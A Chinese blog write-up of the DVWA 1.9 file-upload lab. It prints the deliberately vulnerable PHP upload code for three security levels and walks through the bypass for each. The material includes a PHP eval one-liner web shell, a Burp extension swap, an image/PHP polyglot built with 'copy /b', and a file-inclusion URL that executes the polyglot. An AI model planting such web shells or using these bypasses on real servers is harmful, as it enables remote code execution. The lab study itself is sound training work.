DVWA (1.9)文件上传漏洞详解

测试平台使用的DVWA 1.9 版本 +phpStudy环境测试

1.low级别
源码分析:

<?php 
if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 
?> 

这个级别中没有过滤函数,上传一句话木马文件<?php @eval($_POST["pass"]);?> php文件,使用菜刀连接即可获取数据库信息,在连接的过程中要注意使用burp进行抓包,在中国菜刀上连接dvwa时默认的cookie是impossible模式,使用burp拦截请求后在请求头信息中添加cookie信息:Cookie: security=low; PHPSESSID=n693sr05jbtn03nh63ageq57j1 后可解决连接失败的问题。

2.medium级别
源码分析:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 

    // Is it an image? 
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 

        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?> 

这个级别只对文件名进行过滤,上传漏洞构建的思路是,先把php一句话木马保存成png的模式,在点击上传之前使用burpsuit拦截包,然后在burp中修改文件后缀名为php文件,即可成功上传。最后使用菜刀连接即可。

3.high级别
源码分析:
<?php

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
//返回文件名
   $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 
    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
//返回后缀名
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 
    // Is it an image? 
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 
        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 
?> 

函数解析:
• stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)
• strpos() - 查找字符串在另一字符串中第一次出现的位置(区分大小写)
• strripos() - 查找字符串在另一字符串中最后一次出现的位置(不区分大小写)
• strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。(区分大小写)
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。
在真实的环境下测试函数:

$checkImage=getimagesize($fileTmpName);
var_dump($checkImage);

输出结果:
array (size=7)
  0 => int 1024
  1 => int 583
  2 => int 2
  3 => string 'width="1024" height="583"' (length=25)
  'bits' => int 8
  'channels' => int 3
  'mime' => string 'image/jpeg' (length=10)

经过上面的分析,我们在一张真正的图片后添加一段一句话木马,在cmd框中执行下面命令:

copy  11.jpg/b+11.php/a 123.jpg

把生成的图片上传到服务器,然后使用菜刀连接,直接连接的话是不能识别图片木马的,在这里使用下面路径连接:

http://192.168.15.201/DVWA-1.9/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\DVWA-1.9\hackable\uploads\123.jpg
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值